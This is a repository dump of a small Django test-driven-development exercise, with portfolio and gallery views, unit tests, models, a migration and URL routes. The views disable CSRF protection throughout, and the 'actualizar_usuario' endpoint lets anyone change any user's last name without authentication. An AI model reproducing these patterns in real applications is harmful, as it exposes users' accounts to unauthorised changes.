"length_bytes": 2399, "license_type": "no_license", "max_line_length": 116, "num_lines": 66, "path": "/galleryTddProject/portafolio/views.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.management import get_default_username\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core import serializers\nfrom rest_framework.decorators import api_view\n\nfrom .models import Portafolio\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login\nimport json\n\n# Create your views here.\n@csrf_exempt\ndef index(request):\n portafolios_list = Portafolio.objects.all()\n return HttpResponse(serializers.serialize(\"json\", portafolios_list))\n\n\n@csrf_exempt\ndef add_user_view(request):\n if request.method == 'POST':\n json_user = json.loads(request.body)\n username = json_user['username']\n first_name = json_user['first_name']\n last_name = 
json_user['last_name']\n password = json_user['password']\n email = json_user['email']\n\n user_model = User.objects.create_user(\n username=username, password=password)\n user_model.first_name = first_name\n user_model.last_name = last_name\n user_model.email = email\n user_model.save()\n return HttpResponse(serializers.serialize(\"json\", [user_model]))\n\n\ndef get_portafolios_publicos(request, username):\n usuario = User.objects.get(username=username)\n print(usuario)\n portafolios_list = Portafolio.objects.filter(user=usuario, public=True)\n return HttpResponse(serializers.serialize(\"json\", portafolios_list))\n\n\n@csrf_exempt\ndef iniciar_sesion(request):\n json_user = json.loads(request.body)\n username = json_user['username']\n password = json_user['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n # Redirect to a success page.\n return HttpResponse(status=200)\n else:\n # Return an 'invalid login' error message.\n return HttpResponse(status=400)\n\n@api_view(['PUT'])\n@csrf_exempt\ndef actualizar_usuario(request):\n if request.method == 'PUT':\n datos_usuario= json.loads(request.body)\n user = User.objects.filter(username= datos_usuario['username']).update(last_name=datos_usuario['last_name'])\n obj = User.objects.filter(username=datos_usuario['username']).first()\n return HttpResponse(serializers.serialize(\"json\", [obj]), content_type='application/json')\n\n\n" }, { "alpha_fraction": 0.6356960535049438, "alphanum_fraction": 0.6414431929588318, "avg_line_length": 50.31147384643555, "blob_id": "fd1cbf425ecc54dc6ad41ebd09f087482e0fdb4f", "content_id": "a0384f75b1459d21bdc56dc74ae484fa4fa2a821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3132, "license_type": "no_license", "max_line_length": 186, "num_lines": 61, "path": "/galleryTddProject/portafolio/tests.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase, Client\n\n# Create your tests here.\nfrom .models import Portafolio\nimport json\n\n# Create your tests here.\n\n\nclass PortafolioTestCase(TestCase):\n\n def test_list_portafolios_status(self):\n url = '/portafolios/'\n response = self.client.get(url, Format='json')\n self.assertEqual(response.status_code, 200)\n\n def test_count_portafolios_list(self):\n user_model = User.objects.create_user(\n username='test', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Portafolio.objects.create(user=user_model)\n Portafolio.objects.create(user=user_model)\n\n response = self.client.get('/portafolios/')\n current_data = json.loads(response.content)\n self.assertEqual(len(current_data), 2)\n\n def test_add_user(self):\n response = self.client.post('/portafolios/addUser/', json.dumps({\"username\": \"testUser\", \"first_name\": \"Test\",\n \"last_name\": \"User\", \"password\": \"AnyPas#5\", \"email\": \"[email protected]\"}), content_type='application/json')\n current_data = json.loads(response.content)\n self.assertEqual(current_data[0]['fields']['username'], 'testUser')\n\n def test_get_portafolios_publicos(self):\n user_model = User.objects.create_user(\n username='testUser', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Portafolio.objects.create(user=user_model, public=True)\n Portafolio.objects.create(user=user_model, public=False)\n response = 
self.client.get('/portafolios/publicos/testUser')\n print(response)\n current_data = json.loads(response.content)\n self.assertEqual(len(current_data), 1)\n\n def test_login(self):\n user_model = User.objects.create_user(\n username='testUser', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n response = self.client.post('/portafolios/login/', json.dumps(\n {\"username\": \"testUser\", \"password\": \"kd8wke-DE34\", }), content_type='application/json')\n self.assertEqual(response.status_code, 200)\n user_model2 = User.objects.create_user(\n username='testUser2', password='kd8wXASFDke-DE34', first_name='test', last_name='test', email='[email protected]')\n response2 = self.client.post('/portafolios/login/', json.dumps(\n {\"username\": \"testUser2\", \"password\": \"kd8wke-DE34\", }), content_type='application/json')\n self.assertEqual(response2.status_code, 400)\n\n def test_editar_datos(self):\n user_model = User.objects.create_user(\n username='testUser', password='kd8wke-DE34', first_name='Sebastian', last_name='Mujica', email='[email protected]')\n response = self.client.put('/portafolios/actualizarUsuario/', json.dumps({\"username\": \"testUser\", \"password\": \"kd8wke-DE34\", \"last_name\":\"Diaz\"}), content_type='application/json')\n current_data = json.loads(response.content)\n self.assertEqual(current_data[0]['fields']['last_name'],\"Diaz\")\n\n" }, { "alpha_fraction": 0.6668432354927063, "alphanum_fraction": 0.6710805296897888, "avg_line_length": 47.43589782714844, "blob_id": "0bb09d32a609cc44b175791bd8b255f6ddb72c8d", "content_id": "8f300c4c1db93be34eaac8e549c58c27b3d44cb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1888, "license_type": "no_license", "max_line_length": 213, "num_lines": 39, "path": "/galleryTddProject/gallery/tests.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django.test import TestCase, Client\n\n# Create your tests here.\nfrom .models import Image\nimport json\n\n# Create your tests here.\nclass GalleryTestCase(TestCase):\n\n def test_list_images_status(self):\n url = '/gallery/'\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, 200)\n\n def test_count_images_list(self):\n user_model = User.objects.create_user(username='test', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Image.objects.create(name='nuevo', url='No', description='testImage', type='jpg', user=user_model)\n Image.objects.create(name='nuevo2', url='No', description='testImage', type='jpg', user=user_model)\n\n response=self.client.get('/gallery/')\n current_data=json.loads(response.content)\n print(current_data)\n self.assertEqual(len(current_data),2)\n\n def test_verify_first_from_images_list(self):\n user_model = User.objects.create_user(username='test', password='kd8wke-DE34', first_name='test', last_name='test', email='[email protected]')\n Image.objects.create(name='nuevo', url='No', description='testImage', type='jpg', user=user_model)\n Image.objects.create(name='nuevo2', url='No', description='testImage', type='jpg', user=user_model)\n\n response=self.client.get('/gallery/')\n current_data=json.loads(response.content)\n\n self.assertEqual(current_data[0]['fields']['name'],\"nuevo\")\n\n def test_add_user(self):\n response=self.client.post('/gallery/addUser/',json.dumps({\"username\": \"testUser\", \"first_name\": \"Test\", 
\"last_name\": \"User\", \"password\": \"AnyPas#5\", \"email\": \"[email protected]\"}), content_type='application/json')\n current_data=json.loads(response.content)\n self.assertEqual(current_data[0]['fields']['username'],'testUser')" }, { "alpha_fraction": 0.7441860437393188, "alphanum_fraction": 0.7541528344154358, "avg_line_length": 32.11111068725586, "blob_id": "307fca02434e44018689de6e4f9acc67e3c218b3", "content_id": "867c14e6e915a03c12d63e04d28e40baf5b8f11c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/galleryTddProject/portafolio/models.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Create your models here.\nclass Portafolio(models.Model):\n name = models.CharField(max_length=200)\n user = models.ForeignKey(User, null=True, on_delete=models.PROTECT)\n public = models.BooleanField(default=False)\n\n\n\n" }, { "alpha_fraction": 0.7160493731498718, "alphanum_fraction": 0.7456790208816528, "avg_line_length": 39.5, "blob_id": "18c1daa2e3abce669caaf5656644dd9be4f5f7b5", "content_id": "c347ac9af4c4f23d5ea218e694c33ae42911ff7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 71, "num_lines": 10, "path": "/galleryTddProject/gallery/models.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django.db import models\n\n# Create your models here.\nclass Image(models.Model):\n name = models.CharField(max_length=200)\n url = models.CharField(max_length=1000)\n description = models.CharField(max_length=1000, null=True)\n type = models.CharField(max_length=5, blank=True)\n user = models.ForeignKey(User, null=True, on_delete=models.PROTECT)\n" }, { "alpha_fraction": 0.5473145842552185, "alphanum_fraction": 0.5959079265594482, "avg_line_length": 20.72222137451172, "blob_id": "602d4ba367c7a96cdd56792345e9451bbed0383b", "content_id": "6a6a64259b0a3d8d0cd2c0e10775aa3ac0526fb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/galleryTddProject/portafolio/migrations/0003_portafolio_public.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.4 on 2020-03-27 00:20\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('portafolio', '0002_portafolio_user'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='portafolio',\n name='public',\n field=models.BooleanField(default=False),\n ),\n ]\n" }, { "alpha_fraction": 0.6568047404289246, "alphanum_fraction": 0.6568047404289246, "avg_line_length": 20.125, "blob_id": "9ba8d6fd88776b5312376db948396e35ce19f920", "content_id": "b813b52a503de3e71ceb7c5a4915f3ef5f58ae75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/galleryTddProject/gallery/urls.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('addUser/', views.add_user_view, name='addUser'),\n]\n" }, { "alpha_fraction": 0.6658291220664978, "alphanum_fraction": 0.6658291220664978, "avg_line_length": 25.53333282470703, "blob_id": "982656f8141591b04365b2f18ff3e09e73fc6de6", "content_id": "440cf135027e6c7d4e5f3e765b17f3206d259edc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 73, "num_lines": 15, "path": "/galleryTddProject/portafolio/urls.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('addUser/', views.add_user_view, name='addUser'),\n path('publicos/<slug:username>',\n views.get_portafolios_publicos, name='publicos'),\n path('login/', views.iniciar_sesion, name='login'),\n path('actualizarUsuario/', views.actualizar_usuario, name='editUser')\n\n\n\n]\n" } ]
10
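Editor's note on `iniciar_sesion` in the record above: `django.contrib.auth.login` is imported but never called, so the view only verifies credentials and never creates a session, and the "Redirect to a success page" comments do not match the plain status responses. A minimal sketch of how the session step might be wired in, assuming that was the intent; not part of the original repo:

```python
# Hypothetical variant of iniciar_sesion that also attaches the session.
import json
from django.contrib.auth import authenticate, login
from django.http import HttpResponse

def iniciar_sesion(request):
    datos = json.loads(request.body)
    user = authenticate(request, username=datos['username'],
                        password=datos['password'])
    if user is not None:
        login(request, user)  # persist the authenticated user in the session
        return HttpResponse(status=200)
    return HttpResponse(status=400)
```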
Sidd0602/hello-world
https://github.com/Sidd0602/hello-world
407ff77a57cfa81bb25b15261d768f5bc38cd724
ca5fde3aedc057a6e86a8bbf1a76a59781539d8c
8d11c6bf67a0ee13ac77d651a87ee29f4a675c42
refs/heads/master
2021-12-24T03:40:51.934165
2021-10-13T12:53:11
2021-10-13T12:53:11
82,387,855
0
0
null
2017-02-18T13:15:27
2021-10-05T18:22:20
2021-10-06T12:55:58
Python
[ { "alpha_fraction": 0.6424474120140076, "alphanum_fraction": 0.6489483714103699, "avg_line_length": 35.31944274902344, "blob_id": "04ebe833b94865e55b259ab5263f4bb6bfa9623f", "content_id": "e385adff820aa6ef97d623abc3f2a6b69488f2ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2615, "license_type": "no_license", "max_line_length": 164, "num_lines": 72, "path": "/Python/AMZ-Scraper.py", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "!pip install selenium #install selenium if not already present\n\n# Amazon StyleSnap Automated Scraping\n\n# Import useful functions\nimport time \nimport urllib.request\n\n# Import selenium related functions\nfrom selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nlogfile = \"scraper-log.txt\"\nlog_writer = open(logfile, \"a\") \n# Creating an instance webdriver\nbrowser = webdriver.Chrome(executable_path=r'chromedriver.exe') #add the webdriver here\nbrowser.maximize_window()\nbrowser.get(\"https://www.amazon.in/stylesnap\")\n\ndef scrape_data(input_img):\n # collect the data--\n button_group = browser.find_elements_by_class_name(\"bbx-dot\")\n for button in button_group:\n gender = \"\"\n actions = ActionChains(browser)\n url_list = []\n button.click()\n for _ in range(10):\n actions.send_keys(Keys.SPACE).perform()\n time.sleep(1)\n try: # identify the gender\n gender_filter = browser.find_element_by_xpath(\"/html/body/div[1]/div[2]/div/div/div[3]/div/div[1]/div[2]/div[1]/div[2]/div/ul/li[1]/div/label/span[2]\").text\n gender = \"Female\"\n except:\n gender = \"Male\"\n\n product_lists = browser.find_elements_by_class_name(\"cellContainer\")\n print(\"Input-file,\" + input_img + \",recommended-gender,\" + gender + \",total-recommendations,\" + str(len(product_lists)))\n log_writer.write(\"Input-file,\" + input_img + \",recommended-gender,\" + gender + \",total-recommendations,\" + str(len(product_lists)) + \"\\n\")\n iter_count = 1\n\n for product in product_lists:\n try:\n product_tag = product.find_element_by_tag_name('a')\n product_link = product_tag.get_property('href')\n image_tag = product.find_element_by_tag_name('img')\n image_path = image_tag.get_attribute('src')\n urllib.request.urlretrieve(image_path, download_folder + input_img + \"-RECO-\" + str(iter_count) + \".jpg\")\n url_list.append(product_link)\n iter_count += 1\n except:\n continue\n with open(download_folder + input_img + \"-reco-list.txt\", 'w') as f:\n for item in url_list:\n f.write(\"%s\\n\" % item)\n \n\niter_items = [] # list to maintain items to iterate over\n\nfor image_id in iter_items:\n time.sleep(3)\n browser.find_element_by_id(\"file\").send_keys(\"item_path_\" + str(image_id))\n time.sleep(5)\n scrape_data(\"item_path_\" + str(image_id))\n time.sleep(2)\n browser.get(\"https://www.amazon.in/stylesnap\")\n \nlog_writer.close()\nbrowser.close()\nbrowser.quit()\n" }, { "alpha_fraction": 0.6058931946754456, "alphanum_fraction": 0.6187845468521118, "avg_line_length": 20.719999313354492, "blob_id": "e25e82d1be8d17447797a1d09d849a7dadaa13ed", "content_id": "16b5d3405e39497e7ca5a2b46189632011af9e81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1086, "license_type": "no_license", "max_line_length": 50, "num_lines": 50, "path": "/Python/stats.py", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "# male vs female\nimport 
numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom statistics import multimode\n\ninput_file = input()\ndf = pd.read_csv(input_file)\nresults = df.iloc[:,:]\nresults\n\ndef get_mode(gender_series):\n numpy_array = gender_series.to_numpy()\n print(','.join(multimode(numpy_array)))\n\ncount = 0\nfor j in range(5,215,2):\n get_mode(results.iloc[:,j])\n \n\nfrom itertools import islice\nfrom scipy.stats import kendalltau\nfrom scipy.stats import spearmanr\nfrom scipy.stats import pearsonr\nfilename = input()\nX = [1, 2, 3, 4, 5]\nkt_list = []\nsp_list = []\n\nwith open(filename,'r') as file:\n while True:\n next_n_lines = list(islice(file, 5))\n if not next_n_lines:\n break\n else:\n results = list(map(int, next_n_lines))\n kt_corr, _ = kendalltau(X, results)\n sp_corr, _ = spearmanr(X, results)\n sp_list.append(sp_corr)\n kt_list.append(kt_corr)\n\n\n\nprint(\"Spearman\")\nfor corr in sp_list:\n print('%.3f' % corr)\n \nprint(\"KT\")\nfor corr in kt_list:\n print('%.3f' % corr)\n" }, { "alpha_fraction": 0.7906976938247681, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 56.33333206176758, "blob_id": "34d4472a62dbd250778931117f4b56a3a465e9a2", "content_id": "fc24880d22e7356fb712eada1383d42b70d117a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "no_license", "max_line_length": 80, "num_lines": 3, "path": "/README.md", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "# hello-world\nThis is the first repository I'm creating on github. It just has HELLO WORLD\nThis is the first branch edit. I'm learning web development and software design.\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6038498282432556, "avg_line_length": 47.5514030456543, "blob_id": "8c18564f68832aa73f80f6278dc2376ddc77074f", "content_id": "f7b0fea06d811847d01b1e4632e2ec489b2352fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5195, "license_type": "no_license", "max_line_length": 152, "num_lines": 107, "path": "/Python/BGL-Scraper.py", "repo_name": "Sidd0602/hello-world", "src_encoding": "UTF-8", "text": "# Import useful functions\nimport time \nimport urllib.request\n\n# Import selenium related functions\nfrom selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\nlogfile = input()\nlog_writer = open(logfile, \"a\") \n\n# Creating an instance webdriver\nbrowser = webdriver.Chrome(executable_path=r'chromedriver.exe')\nbrowser.maximize_window()\nbrowser.get(\"https://beagle.vision/\")\nactions = ActionChains(browser)\n\ndownload_folder = \"/path/to/folder\"\n\ndef string_mod(button_label):\n label_array = button_label.split(\",\")\n label_array = [x.strip(' ') for x in label_array]\n label_array = [x.replace(\"-\",\"\") for x in label_array]\n final_label = '-'.join(label_array)\n return final_label\n \n\ndef scrape_data(input_img):\n button_grp = browser.find_element_by_xpath(\"/html/body/main/div/div[1]/div/div[2]/div[2]/div[2]\")\n button_children = button_grp.find_elements_by_xpath(\".//*\")\n for button in button_children:\n product_list = []\n url_list = []\n new_button_label = string_mod(button.text)\n button.click()\n time.sleep(7)\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n result_top_level_div = browser.find_element_by_id(\"vs-results\")\n result_row = 
result_top_level_div.find_element_by_class_name(\"row\")\n product_list = result_row.find_elements_by_class_name(\"col\") # all products recommended for this input image\n print(\"Input-file,\" + input_img + \"-\" + new_button_label + \",total-recommendations,\" + str(len(product_list)))\n log_writer.write(\"Input-file,\" + input_img + \",total-recommendations,\" + str(len(product_list)) + \"\\n\")\n iter_count = 1\n \n for product in product_list:\n try:\n product_tag = product.find_element_by_tag_name('a')\n product_img_div = product_tag.find_element_by_class_name(\"product-img-wrap\")\n product_img_div_second = product_img_div.find_element_by_class_name(\"product-img\")\n product_img_div_final = product_img_div_second.find_element_by_tag_name(\"div\")\n product_img_tag = product_img_div_final.find_element_by_tag_name('img')\n product_img_link = product_img_tag.get_attribute('src')\n urllib.request.urlretrieve(product_img_link, download_folder + input_img + \"-\" + new_button_label + \"-RECO-\" + str(iter_count) + \".jpg\")\n product_link = product_tag.get_property('href')\n url_list.append(product_link)\n iter_count += 1\n except:\n continue\n with open(download_folder + input_img + \"-\" + new_button_label + \"-reco-list.txt\", 'w') as f:\n for item in url_list:\n f.write(\"%s\\n\" % item)\n\n print(\"Input-file,\" + input_img + \",button-texts,\" + button.text)\n if (button.text.find('label') != -1): #todo: check only for those buttons which identify the clothing\n button.click()\n time.sleep(7)\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n result_top_level_div = browser.find_element_by_id(\"vs-results\")\n result_row = result_top_level_div.find_element_by_class_name(\"row\")\n product_list = result_row.find_elements_by_class_name(\"col\") # all products recommended for this input image\n \n print(\"Input-file,\" + input_img + \",total-recommendations,\" + str(len(product_list)))\n log_writer.write(\"Input-file,\" + input_img + \",total-recommendations,\" + str(len(product_list)) + \"\\n\")\n iter_count = 1\n \n for product in product_list:\n try:\n product_tag = product.find_element_by_tag_name('a')\n product_img_div = product_tag.find_element_by_class_name(\"product-img-wrap\")\n product_img_div_second = product_img_div.find_element_by_class_name(\"product-img\")\n product_img_div_final = product_img_div_second.find_element_by_tag_name(\"div\")\n product_img_tag = product_img_div_final.find_element_by_tag_name('img')\n product_img_link = product_img_tag.get_attribute('src')\n urllib.request.urlretrieve(product_img_link, download_folder + input_img + \"-RECO-\" + str(iter_count) + \".jpg\")\n product_link = product_tag.get_property('href')\n url_list.append(product_link)\n iter_count += 1\n except:\n continue\n with open(download_folder + input_img + \"-reco-list.txt\", 'w') as f:\n for item in url_list:\n f.write(\"%s\\n\" % item)\n \n\niter_items = []\nfor image_id in iter_items:\n time.sleep(3)\n browser.find_element_by_xpath(\"/html/body/main/div/div[1]/div/div[2]/form[2]/input\").send_keys(\"/path/to/file\" + str(image_id))\n time.sleep(10)\n scrape_data(\"/file/identifier\" + str(image_id))\n time.sleep(2)\n browser.get(\"https://beagle.vision/\")\n\nlog_writer.close()\nbrowser.close()\n" } ]
4
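Editor's note: both scrapers in the record above rely on the `find_element_by_*` / `find_elements_by_*` helpers, which were removed in Selenium 4, so the scripts need `selenium<4` pinned or the calls migrated. A minimal sketch of the modern equivalents of the lookups used above, assuming Selenium 4; not part of the original repo:

```python
# Hypothetical Selenium 4 rewrites of the element lookups used in the scrapers.
from selenium import webdriver
from selenium.webdriver.common.by import By

browser = webdriver.Chrome()  # Selenium 4 can resolve the driver on its own

buttons = browser.find_elements(By.CLASS_NAME, "bbx-dot")  # was find_elements_by_class_name
file_input = browser.find_element(By.ID, "file")           # was find_element_by_id
anchor = browser.find_element(By.TAG_NAME, "a")            # was find_element_by_tag_name
label = browser.find_element(By.XPATH, "//label/span[2]")  # was find_element_by_xpath
```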
testerpce/RL_Mtech_2_off_imitation
https://github.com/testerpce/RL_Mtech_2_off_imitation
3153cacd4503403cb4f2a9209b2016076f4f9bca
60ff7bcad899d8a4830927b3d82b150fe8d8c94a
abea2b505b2f50025ada0ec0f9eb1dd48c7b7520
refs/heads/master
2020-05-23T05:42:13.948557
2019-05-22T19:36:51
2019-05-22T19:36:51
186,652,309
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4607631266117096, "alphanum_fraction": 0.4787617027759552, "avg_line_length": 34.61538314819336, "blob_id": "2a0c3248f94d9d18ec14a75c718743bca2e38394", "content_id": "87b213ff70d0a6dfd485456eb6bd8025af2a2bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1389, "license_type": "no_license", "max_line_length": 96, "num_lines": 39, "path": "/Test_imitator.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 14 12:29:46 2019\n\n@author: sayambhu\n\"\"\"\n\nfrom Imitator import Imitator\n# =============================================================================\n# import os\n# from utils_imitate import get_saved_hyperparams,create_test_env\n# =============================================================================\nprint (\"\\n Imitator imported \\n\")\n\n################################\n#Time to normalize the environment\nimport gym\nenv_id='BipedalWalker-v2'\n# =============================================================================\n# stats_path=os.path.join(os.getcwd(),env_id)\n# hyperparams, stats_path = get_saved_hyperparams(stats_path, norm_reward=False, test_mode=True)\n# algo_id='Imitator'\n# print(\"hyperparams here= \",hyperparams)\n# \n# log_dir=os.path.join(os.getcwd(),'logs',algo_id,env_id)\n# env = create_test_env(env_id,n_envs=1, is_atari=False,log_dir=log_dir,\n# stats_path=stats_path, seed=1000,\n# should_render=True,\n# hyperparams=hyperparams)\n# =============================================================================\nenv=gym.make('BipedalWalker-v2')\n\n###############################\nprint(\"\\n Gym made \\n\")\nimit=Imitator(env,max_episode_len=2000)\nprint(\"\\n Imitator made \\n\")\nimit.learn()\nprint(\"\\n imitator learn done \\n\")\n" }, { "alpha_fraction": 0.4928511381149292, "alphanum_fraction": 0.5043454170227051, "avg_line_length": 36.03191375732422, "blob_id": "44ec71c24fd96739c6721fd1da22b15a88807d76", "content_id": "73ac728ac9c4605526f52d4aafc854ad83030c5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3567, "license_type": "no_license", "max_line_length": 119, "num_lines": 94, "path": "/Replay_Buffer_np.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 8 16:04:49 2019\n\n@author: sayambhu\n\"\"\"\n\nfrom collections import deque\nimport random\nimport numpy as np\n\n\n\nclass ReplayBuffer(object):\n \n def __init__(self,buffer_size,state_dim,action_dim,random_seed=123):\n \"\"\"\n The right side of deque contains the most recent experiences\n \"\"\"\n print(\"Creating Replay Buffer object\")\n self.buffer_size=buffer_size\n self.state_dim=state_dim\n self.action_dim=action_dim\n self.pointer=0\n self.states=np.zeros(shape=[buffer_size,state_dim])\n self.actions=np.zeros(shape=[buffer_size,action_dim])\n self.rewards=np.zeros(shape=[buffer_size,1])\n self.dones=np.zeros(shape=[buffer_size,1])\n self.next_states=np.zeros(shape=[buffer_size,state_dim])\n self.filled=False\n \n random.seed(random_seed)\n \n def add(self,s,a,r,t,s2):\n \n self.states[self.pointer] = s\n self.actions[self.pointer] = a\n self.rewards[self.pointer] = r\n self.dones[self.pointer] = t\n self.next_states[self.pointer] = s2\n \n self.pointer +=1\n if self.pointer%self.buffer_size == 0 :\n 
self.filled=True\n self.pointer =self.pointer%self.buffer_size\n \n def expert_add(self,s,a,r,t,s2):\n self.states[0:self.buffer_size]=s[0:self.buffer_size]\n self.actions[0:self.buffer_size]=a[0:self.buffer_size]\n self.rewards[0:self.buffer_size]=r[0:self.buffer_size]\n self.dones[0:self.buffer_size]=t[0:self.buffer_size]\n self.next_states[0:self.buffer_size]=s2[0:self.buffer_size]\n \n self.filled=True\n self.pointer=0\n \n def size(self):\n if self.filled:\n return self.buffer_size\n else:\n return self.pointer\n \n def sample_batch(self,batch_size):\n \n if self.filled :\n# =============================================================================\n# print(\"reaching in filled\")\n# =============================================================================\n indexes=np.random.randint(low=0,high=self.buffer_size,size=batch_size)\n return self.states[indexes,:],self.actions[indexes,:],self.rewards[indexes,:], self.next_states[indexes, :]\n else:\n# =============================================================================\n# print(\"reaching if not filled\")\n# =============================================================================\n if self.size() > batch_size:\n# =============================================================================\n# print(\"Reaching size greater condition\")\n# =============================================================================\n \n indexes=np.random.randint(low=0,high=self.pointer,size=batch_size)\n return self.states[indexes,:],self.actions[indexes,:],self.rewards[indexes,:], self.next_states[indexes, :]\n \n \n \n \n def clear(self):\n self.states=np.zeros(shape=[self.buffer_size,self.state_dim])\n self.actions=np.zeros(shape=[self.buffer_size,self.action_dim])\n self.rewards=np.zeros(shape=[self.buffer_size,1])\n self.dones=np.zeros(shape=[self.buffer_size,1])\n self.next_states=np.zeros(shape=[self.buffer_size,self.state_dim])\n self.pointer=0\n self.filled=False\n \n \n \n \n \n \n \n \n \n \n " }, { "alpha_fraction": 0.48331698775291443, "alphanum_fraction": 0.49254170060157776, "avg_line_length": 45.19178009033203, "blob_id": "ca2d251db289d613eb3a5bdc7c74663fbe153696", "content_id": "69195f7b55ec679b8105a4d73079fd3890318eaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10190, "license_type": "no_license", "max_line_length": 199, "num_lines": 219, "path": "/Imitator.py", "repo_name": "testerpce/RL_Mtech_2_off_imitation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 10 19:07:41 2019\n\n@author: sayambhu\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\nfrom Actor_critic_imitator import ActorNetwork, CriticNetwork\nimport gym\nfrom Replay_Buffer_np import ReplayBuffer\nfrom utils_imitate import OrnsteinUhlenbeckActionNoise#,build_summaries\n\nclass Imitator:\n \n def __init__(self,env,actor=None,critic=None,actor_lr=0.0001,critic_lr=0.001,\n gamma=0.99,tau=0.001,actor_bn=True,critic_bn=True,\n tensorboard_log=None,replay_buffer=None,batch_size=64,\n replay_buffer_size=50000,expert_buffer=None,\n expert_dir='TD3_BipedalWalkerv2_Unorm.npz',\n random_seed=999,summary_dir='./logs',\n max_episode_len=1000,buffer_size=1000):\n self.env=env\n self.state_dim=env.observation_space.shape[0]\n self.action_dim=env.action_space.shape[0]\n self.actor=actor\n self.critic=critic\n self.actor_lr=actor_lr\n self.critic_lr=critic_lr\n self.gamma=gamma\n self.tau=tau\n self.actor_bn=actor_bn\n 
